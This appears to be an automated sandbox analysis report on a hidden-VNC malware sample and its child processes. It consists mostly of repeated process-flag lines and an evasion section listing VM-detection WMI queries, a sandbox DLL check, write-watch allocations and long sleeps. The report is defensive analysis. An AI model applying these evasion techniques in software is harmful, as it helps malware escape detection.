Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: hvnc-CR-SCR-0710.bin.exe PID: 7164, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: msql2.exe PID: 2140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: msql2.exe PID: 5356, type: MEMORYSTR
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory allocated: 1450000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory allocated: 2E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory allocated: 1450000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: DC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 28D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 48D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory allocated: D30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory allocated: 2A40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory allocated: 2850000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 14C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2F80000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2E80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory allocated: 1A30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory allocated: 34C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory allocated: 1A30000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: D30000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 29F0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2750000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599822 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599691 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599563 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598953 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598609 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598500 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598390 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598281 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598172 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598062 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597932 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597719 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597481 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597374 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599339 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598797 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598687 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598578 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598468 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598156 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597888 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597655 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597546 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597319 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597203 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599000 Jump to behavior
